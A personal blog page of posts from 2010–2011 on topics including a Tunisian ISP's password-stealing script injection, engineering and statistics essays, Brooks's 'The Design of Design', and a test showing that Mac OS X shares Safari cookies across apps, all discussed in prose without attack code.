Blog

All timestamps are based on your local time of:

[ View: List | Cloud | Calendar | Latest comments | Photo albums ]

Tunisian keylogger

2011-01-25 18:22:12

Interesting article about how Tunisia started keylogging passwords for anybody logging in to Facebook through a Tunisian ISP. The article praises Facebook for implementing countermeasures, but really Facebook is just stupid for not using SSL to begin with. Especially given the existence of FireSheep that lets you trivially hijack unencrypted browsing sessions on unsecured Wi-Fi networks.

The article doesn't go into the technical details, but according to this page Tunisia was getting their ISPs to inject a script on the login page to steal the password before submitting the login form. So even though the form submit itself was encrypted, they were still able to grab the password. Facebook's response was to change the page with the login form to be https so that the ISPs wouldn't be able to inject the script. It stopped the Tunisian government, but not for technical reasons. Facebook is still vulnerable to exactly the same problem, because an ISP can simply rewrite the pages pointing to the login page to use http links instead of https. In fact, if you access any insecure page on the domain, the ISP can pretty much rewrite all the links to keep you insecure. The average user wouldn't know that all their data was being snatched.

(On a related note, this sort of attack is exactly why my site forces you to type in the https URL directly into the address bar).

[ 0 Comments... ]

Human variables in engineering

2011-01-17 01:43:18

[This blog post is an extension from part of the presentation I gave in class a few days ago.]

There's no one true definition of engineering, but a lot of the definitions you'll find are variants on the same theme: an engineering discipline consists of the application of a science to solve a problem. The problem with all of these definitions is that they downplay the "application" part - that is, the human component of engineering.

The way I see it, engineering is a combination of two main factors. One is the principles and properties from the underlying science. The other is the mind of the human putting the principles and properties together. Different engineering disciplines have different amounts of these two factors, and that has all sorts of implications.

It's probably easier to see with an example. Let's say we stumble through a wormhole into a different universe where our current rules of physics don't apply. Naturally we start a new scientific discipline dedicated to figuring out how that universe operates. After some investigation, we discover three laws. Law one is "if two objects collide, their masses automatically double". Law two is "if an object reaches a mass of 100kg or greater, it splits into three equal pieces". Law three is "if you have an object of 64kg, it turns into a wormhole that sucks you back to our normal universe". Now, you want to return to our normal universe, so you grab all the rocks you can find and weigh them. You find that you have three rocks with masses 1kg, 32kg and 96kg.

The science in this alternate universe provides us with three laws. As engineers, we have different ways in which we can combine these laws in order to solve a problem (getting home). For example, we could collide the 1kg and 32kg rocks together, resulting in 2kg and 64kg rocks. We can then use the 64kg rock to get home. Or we can collide the 1kg and 96kg rocks together, resulting in 2kg and 192kg rocks. The 192kg rock would then split into 3 64kg rocks, which we could use to get home. Or we could collide the 32kg and 96kg rocks, which would also get us home. So with these three rocks, given our stated goal, there's three distinct solutions. If we sent a bunch of engineers over to this alternate universe, it is highly unlikely that they would all use the same solution to get back.

If you view an engineering discipline as a combination of a science and a human mind, then it makes sense to try and figure out how much of the engineering is science and how much of it is the human component. With the example above, for that one problem, the science and the solution space are both bounded. That is, there are only three laws in the science, and only three solutions. But if we added another rock of 1kg, there would be 31 different solutions instead of just three. In this scenario, the solution that actually gets selected is more a function of the human mind and not as determined by the science. On the other hand, if you started out with two rocks of 32kg each, then there's only one possible solution to the problem. In this case, the human component plays a negligible role and the science plays a much bigger role in the engineering solution.

If we take this a step further, and look at the space of all possible problems that can be solved in this universe, and aggregate the science/human ratio over them all, we can figure out how much of the overall engineering discipline depends on the science and how much depends on the human component. (Note: I don't actually know what metrics and aggregation operations would be best to use here. I'm just doing thought experiments.)

So where does this take us? Well, different engineering disciplines are going to have different science/human ratios based on what kind of problems they have and what kind of properties the underlying science has. I think that the greater the human component, the more "complex" we consider the engineering discipline to be. Software engineering, in particular, has a huge number of possible solutions to any problem, and I think that's related to why it is so complex. The human variable in any software engineering project has a huge impact on how the final solution turns out. This is why I claimed in my previous post on experimentation that the human mind is such a HUGE variable in any software program, and any experimentation while leaving this variable uncontrolled results in nonsense results.

[ 0 Comments... ]

Statistics and experimentation

2011-01-14 18:19:53

[This blog post is adapted from part of a presentation I gave in class a few days ago, on a topic I've been thinking about for a while.]

Recently there was a big brouhaha because of some research by Dr. Bem at Cornell. He's a psychologist who did a series of experiments, and 8 out of 9 of his experiments showed that precognition is possible. He's a respected researcher and the paper was peer-reviewed and is scheduled to be published soon in a prominent journal. A lot of people disagree with his conclusions for obvious reasons, and there's been a lot of discussion about how to interpret his results and whether or not his methodology and/or analysis was flawed and/or biased. I particularly like this rebuttal (PDF) of his approach.

Another example of a similar nature is the book Good Calories, Bad Calories which I was reading not too long ago (but didn't finish). It looks at a lot of studies in the field on nutrition and rips apart a lot of them. Most of these studies are not reproducible or even contradict each other, and often have conclusions that are not supported by the data.

The point that I'm trying to make is that when it comes to using statistics to analyze data, there is almost no consensus on how to do it correctly, despite the fact that we've been doing it for decades. It's pretty absurd, if you ask me. There's all sorts of pitfalls that people regularly get caught in, such as Simpson's Paradox, just because it's unclear which variables that were changed in the experiment are relevant to the outcome and which are not.

Take a simple example - that of the boiling point of water. The value of the boiling point is a function of a number of factors, like the atmospheric pressure and salinity of the water. However, it's not a function of other things, such as the heat source that's used to heat up the water. If you aren't aware of which variables affect the results and which do not, you might do something like run a few trials at sea level and run a few trials on top of a mountain, and then average (or more generally, statistically analyze) the results to get a final answer.

But of course, if you average measurements taken at different atmospheric pressures, you get a value that's garbage. It reflects neither the boiling point at sea level nor the boiling point on the mountain. It's the boiling point of somewhere in between, but only because the boiling point is a monotonic function with respect to pressure. If it were some other kind of function, the average would truly be just a nonsense number, even though it looks like a real result.

This is a trivial example and has very few variables. But a lot of the sciences that deal with human subjects do this all the time. Examples abound in psychology, medicine, nutrition, and of course, software engineering. For example, consider the classic software experiment to find out if technology A is better than technology B. You get a bunch of programmers, make sure they are trained equally on A and B, and have them sit down and do a task. Then you average the results from A and average the results from B and compare the two, and conclude that A (or B) is better. But the huge flaw in any experiment of this kind is that the thing you're measuring (the final code produced) is a function of both the technology (A or B) and the mind of the programmer. And the programmer's mind is a HUGE variable, a function of all sorts of things like education and experience and social influence and genetics.

In the boiling water example, it doesn't make sense to average two measurements from different pressures. Instead, it's better to state the result as a function that takes pressure as input and returns the boiling point as the output. Similarly, I think that for the software experiments, it doesn't make sense to just average the results from different programmers. Instead, a better (although currently infeasible) approach would be to represent the programmer as a vector of traits, and to give a function that takes as input such a vector and returns as output whether A or B is better. The vector would have to include every trait that we determine to be relevant to the software engineering process (that is, whether it affects the code that programmers write), so determining exactly what traits should be included is probably impossible. However, if even a few of the main traits can be isolated, we can start getting results that approximate something meaningful, rather than just being nonsense that looks like a real result.

[ 0 Comments... ]

Dream

2011-01-10 11:35:45

I had a dream last night, where the PlayBook came out, and instead of being a 7-inch tablet, it was a larger (~11-inch) semi-flexible screen. Now that would be cool.

[ 1 Comment... ]

The design of design, part 3

2011-01-04 22:26:34

A few final notes on The Design of Design. In Chapter 10, Brooks talks about the "budgeted resource" (i.e. the resource that is the most constrained) when designing something. One of the things he mentions here is the use of "surrogates" - something is used as an approximation for the actual budgeted resource, since the actual budgeted resource is hard to measure. This is basically the same thing I called an "indicator" in an earlier post; he says the same thing I said, but I like the way he says it better. I also like the word "surrogate" more than "indicator", since the connotations are more in line with the idea it expresses.

In Chapter 11, on constraints, he talks about how adding constraints can help narrow the scope of the project and make it easier to come up with a good design. He specifically cites programming language design as an example - a special-purpose language is easier to design well compared to a general-purpose language. This reminded me of an article on language-oriented programming that I read a while ago. The article claims that LOP allows the programmer more freedom of expression, which makes sense. Since LOP allows the programmer to more losslessly express their mental model, it allows for a better design and implementation. (This ties into yesterday's post on mental models).

Another interesting point in the book is in Chapter 15, where he talks about how disciplines have become increasingly specialized, resulting in a greater separation between design, implementation, and use. As an example, he cites how Henry Ford built his own car, but today no computer engineer can physically make his own chips. I think this same thing happens on a smaller scale for individual products as well. When I first worked at RIM as a co-op in 2003, all the employees had a BlackBerry, and used the devices extensively. The designers and implementers were also users, and the process of dogfooding was one of the reasons the devices worked so well.

Today, all the employees still have and use their devices, but something has changed. Specifically, the user market RIM is targeting is no longer the same, and so the employees are no longer representative of the user population. Dogfooding now still helps, but not nearly as much as it used to, since the features the users care about the most are not necessarily the features that get exercised the most internally. This has practical, noticeable consequences. Since RIM's development culture grew up on the concept of using dogfooding to ensure quality, they didn't develop a strong culture for other forms of quality control, such as automated testing. This has resulted in a gradual decline in overall device quality, something that a lot of people have been complaining about lately. The good news is that it's not hard to fix - they just have to stop relying as much on dogfooding and work on other more robust methods of quality control (which is something they're working on).

In general, I think this is a problem for most software projects that follow the Bazaar model of software development. The first guideline put forward by Raymond in his essay is that "every good work of software starts by scratching a developer's personal itch". I don't know if that's always true, but I think that as any such software grows, it will reach a point where it has features not really used by the developer. This also results in a "progressive divorce of the designer from ... the user", as Brooks puts it. Therefore projects that grow past this point have to face the same issues of miscommunication that Brooks talks about in this section.

In Chapter 16, Brooks mentions in passing that "complete modularity also has drawbacks ... optimized designs have components that achieve multiple goals." It occurred to me when reading this that there is a distinction between modular goals and modular components. A component that satisfies multiple goals is good, but a goal that is satisfied by multiple components is bad. He seems to define "complete modularity" as a one-to-one mapping between a goal and a component, whereas I would just leave it at components that don't interact with each other. I might just be a semantic definition issue, but it's something to think more about.

Anyway, that's all I have. It's a pretty thought-provoking book, and full of lots of good advice and insight, so if you're interested in designing stuff, I definitely recommend reading it.

[ 0 Comments... ]

The design of design, part 2

2011-01-04 01:15:14

This post is about conceptual integrity and mental models. I've mentioned this topic before, but in the years since I've come to appreciate much more just how important it is. Brooks talks about conceptual integrity in Chapter 6 of The Design of Design, in the context of collaboration and teamwork. He says that "the solo designer or artist usually produces works with this integrity subconsciously; he tends to make each microdecision the same way each time he encounters it" and that this results in a distinctive design style and conceptual integrity.

I hadn't really thought about this aspect of it before reading this book, but it makes perfect sense because the best designs are simply expressions of a mental model held by somebody. It starts off when the designer has a complete model that is simple enough to completely hold in her head. In order to do this, a lot of the details need to be omitted from the mental model; the simplified essence of the design is what is imagined. That mental model is then used to generate the design, resolving the details as the design is created. The details are basically the microdecisions that Brooks refers to in the quote above. Each detail is resolved so that it is aligned with the overall goal of the project and the mental model.

Note that being able to hold the complete model in your head is essential for this. If the mental model is not simple enough, then the details will get resolved while only considering a subset of the model, and not the entire project. This results in microdecisions that are not perfectly aligned with the goals of the project, inconsistent style, and finally, a poor design.

In the context of team design, the mental model must be shared between all members of the team in order for the design to maintain a consistent style and remain coherent. I'm pretty sure that this is impossible to do perfectly. At team sizes of greater than two people, the difference in mental models is easily noticeable. Teams of size two are something of a special case - I still think that their mental models are not perfectly consistent, but it's much harder to detect. Brooks has a section in the book titled "Two-Person Teams Are Magical" which describes how the interaction between the members of a two-person team can lead to synchronization of effort and mental models. I think that makes sense, but only for as long as the two people are working together and freely exchanging ideas. As soon as they separate and start thinking about the model apart from one another, their mental models diverge faster and the coherence is harder to maintain.

One of the reasons for this is that transferring a mental model from one person to another is always lossy (at least with current non-telepathic communication channels). If you think about it, this transmission of mental models is something we've been trying to perfect for millenia - the transfer of the mental model from teacher to student is the essence of teaching in any domain. The reason it works better in a two-person team than in a three-person (or larger) team is basically an issue of psychology. If you are brainstorming and trying to explain your ideas to a number of listeners, and one of those listeners understands it before others do, you will tend to favor communication with that listener over the others. This results in any other listeners being "left behind" as the brainstorming proceeds. In the case of a two-person team, there are no other listeners to get left behind, so this situation doesn't arise. There's probably a whole raft of other human psychology factors that come into play here, but I'm pretty sure that the majority of them favor coherence in two-person teams over larger teams.

As an aside, Brooks also says that "any product ... must nevertheless be conceptually coherent to the single mind of the user." This is another point that I didn't pay much attention to before, but that illustrates exactly why a divide-and-conquer approach doesn't result in user-friendly designs. That is, if you have a team of designers, and each of them handles the design for a separate component of the project rather than sharing the same mental model, then each component will have conceptual integrity within itself, but the project as a whole will lack it. This means a user, who needs to use the entire system, will have to replicate the models from each member of the design team, which is much harder to do.

This last point reminds me of the git user manual, currently the single best piece of documentation I have ever read. Very few other tutorials on git (or any other RCS, or any other system, for that matter) try to help the user build a mental model of what is happening under the covers. They mostly give the user a bunch of commands for specific tasks (e.g. creating a new code branch) and expect them to figure out the rest.

The git manual, on the other hand, has a section on "Understanding history" early on, which allows the user to start building a mental model of what git is doing. The rest of the manual the explains the git commands in terms of that mental model, so that git is perfectly predictable and completely intuitive to the user. By "the user" here I really mean "me", since this is what happened when I read the manual. Literally overnight, I went from being a git n00b to being completely unafraid of git, and able to carry out any operations I wanted. If you haven't read the git user manual, and especially if you've never used git before, I strongly suggest you do so. I'm curious to see if it works the same for others as it did for me.

I'm convinced that Linus Torvalds had the kind of mental model I'm talking about when he designed git, and that is the reason why the design is so coherent. Since he was also the one who wrote the original version of the user manual, it's no surprise that it allows the reader to (approximately) re-create that original mental model and use that to understand git operations. I'm also convinced that the design coherence and simplicity of git, a direct result of the mental model Torvalds had, is the reason git is so widely popular today, despite alternatives that arguably offer more features with no significant disadvantage.

[ 0 Comments... ]

The design of design, part 1

2011-01-02 20:55:13

I recently read The Design of Design - a book by Fred Brooks (he of the MMM). It was pretty interesting, and I would recommend it to any designers in the computer industry. Although Brooks tries to abstract out the design concepts from being tied to specific domains, a lot of the examples he uses are from software/hardware, so people working in other domains might find it harder to follow. There are also some case studies near the end of the book which also look at design projects in other domains, such as home renovations, book writing, etc., but I found the case studies to not be all that useful to begin with. Anyway, as I was reading I had some thoughts about stuff he said. This is the first in a series of posts on this topic.

(Warning: this post turned out to be more rambling than I expected, since I didn't really have a clear point to make. But composing this post helped me think about this stuff more clearly, so I'm going to post it anyway instead of just deleting it.)

In Chapter 4, he talks about how, because of imperfect communication and human "sins", we need to create contracts that identify the deliverables and lock down requirements and constraints. In software, the problem is usually that the contracts are created too early, before a full understanding of the project and its design can be reached. This is partly because with software, it's often hard to tell where the design stops and the implementation starts. However, when I think about my own experiences, I've noticed there's usually a point where I know I've hammered out all the unknowns for a particular component - I have a fairly concrete idea of what I need to do, what data structures and algorithms I'm going to use, and the overall architecture of the code that I'm working on. Although I haven't considered all the details, and resolving those details may affect the component architecture I have in mind, it's highly unlikely that those details will cause a change in the overall design of the project. This is the point where I would consider the "design" done.

The problem is that this point occurs pretty late in the project. For one thing, I tend to favor top-down designs and work on components sequentially. Within each component, I would estimate that the "design is done" point occurs after 60%-70% of the total time I spend on the component. So if I have a project with four equal-sized components, with my usual programming style, I would only be finished with all the design work after completely finishing the first three components and finishing ~65% of the work on the fourth component. This would put me at ~91% done for the whole project. Even if I shifted things around and did all the design work for the components first, it would still take me 60%-70% of the total time spent on the project just to complete the design.

Now if the project is something that I'm doing for my own needs, then this isn't a problem. But in industry, the design might be one of the factors used in coming up with an time/cost estimate for the whole project. Taking ~65% of the total time to provide this estimate is a little unreasonable. But if that's how long it takes to do the design, then that's how long it takes, and I can't think of a way around that. The other option to reduce the estimation time is to find other ways to come up with an estimate - ways that don't require a full design of the project. This is what often happens in industry now - estimates are created based on the amount of time it took for previous projects of similar scope. What I'm afraid of is that by using alternate estimation techniques, people might think there's no longer a need to do any design work* at all, and go straight to haphazardly attempting an implementation which will be poorly designed.

* In this context, I'm using a specific meaning of the word "design" from the book - an interactive process that is used more for helping the customer discover the requirements than for helping the developer determine an implementation strategy. I guess this could largely be called "requirements elicitation" instead of "design work", but the former term doesn't cover everything the latter implies.

[ 0 Comments... ]

Random hacking

2010-12-27 21:38:23

During the last school term, I was working on two different projects where I realized it would be really handy if I could update cells in a spreadsheet from a script. That step was the one step I had to perform manually in an otherwise fully-scripted chain of commands.

I looked around for existing tools to do this but unfortunately couldn't find any that did quite what I needed. So I grabbed the ODFPY library (closest match for what I wanted), a Python language reference, and my trusty sidekick vim. A few hours later I had my first non-trivial python chunk of code, a module on top of ODFPY to read and write arbitrary blocks of cells from and to an ODF spreadsheet. Also managed to fix an existing ODFPY bug along the way.

I submitted my patch and new module to SÃ¸ren Roug, the author of ODFPY, and he agreed to include it as one of the contrib modules distributed with the library so others who find it useful can also use it and extend it as they need.

Just another example that shows how open standards (i.e. ODF) and free/open-source software (i.e. ODFPY) empower users.

And speaking of open systems, I really like the design and flexibility of the ContactsContract API in Android. Creating a sync adapter to inject contact information from custom sources is pretty simple and works more or less how I'd expect it to. I just wish the high-level documentation were a bit better; that would have saved me some time. The same goes for the Android Account API - it looks flexible and well-designed but the package-level documentation is kind of hard to follow.

[ 0 Comments... ]

Website migration

2010-12-19 16:40:09

I've moved my website from its previous home at stakface.com here to staktrace.com. Also switched from BlueHost, whose level of service has been declining significantly for a while now, to DreamHost, which seems to be much better. Also all pages on this site are now HTTPS. If you try to access any URL on this domain via HTTP instead of HTTPS, you'll get an error page telling you to use an HTTPS URL. As the page explains, auto-redirecting to HTTPS is still vulnerable to certain classes of man-in-the-middle attacks, so I prefer to take the approach where you have to fix your URL manually and learn not to do again.

For the most part everything here should work as it did before, but let me know if you run into any problems, either by commenting on this post or via the contact form. If you have any links/bookmarks/RSS readers pointing to the old site, you should update them to point to the new site; just replace "http://stakface.com" with "https://staktrace.com" and leave the rest of the URL the same.

[ 0 Comments... ]

WebKit fun

2010-12-17 00:22:52

So I decided to try to implement the cookie thing I posted about a few days ago. I grabbed a git clone of the WebKit source and built it on my Mac. After poking around for a bit, I found the relevant cookie jar code for the mac platform. Turns out the cookies are actually stored in a system-global singleton cookie jar on Mac OS X (Documentation link).

Well, that's kind of weird and unexpected. Does that mean every app running on my machine has access to my Safari cookies? Let's see... So I wrote a quick Objective-C test app to access the sharedHTTPCookieStorage, and sure enough, I could read out cookies that were set from Safari.

I'm not sure this is a security hole per se, since all apps running on my machine are supposed to be trusted. If there's anything malicious there then they can do worse than steal cookies. But still, to me this seems like a rather odd design decision. I guess it makes sense if you want to have a more unified experience for all apps across your platform. However it's interesting to note that on iOS, the cookies are not shared across applications. Maybe Apple decided that the potential cost wasn't worth the benefit?

Anyway, since I can't trivially change the WebKit cookie jar code, at least on the mac platform, I guess it's time to dive into Mozilla instead...

[ 0 Comments... ]

[ « Newer ]

[ View: List | Cloud | Calendar | Latest comments | Photo albums ]

[ Older » ]